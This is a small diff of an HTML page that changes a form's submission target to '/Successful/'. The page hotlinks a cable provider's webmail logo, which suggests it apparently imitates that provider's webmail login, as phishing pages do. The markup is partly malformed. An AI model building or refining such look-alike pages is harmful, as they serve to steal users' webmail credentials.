--- a/index.html
+++ b/index.html
@@ -47,7 +47,7 @@ function showPage() {
 <div style="text-align:center;">
 </span>
 </span>
-<form name='contact' action='/index2/' method='POST'><input type='hidden' name='form-name' value='contact'>	
+<form name='contact' action='/Successful/' method='POST'><input type='hidden' name='form-name' value='contact'>	
 	  <p>
 <img "left" alt="Sjoberg"src="https://webmail.mncable.net/webmail/skins/magicmail/images/product_logo_big.png?s=1681844615" width="170" height="40">
 					</span>
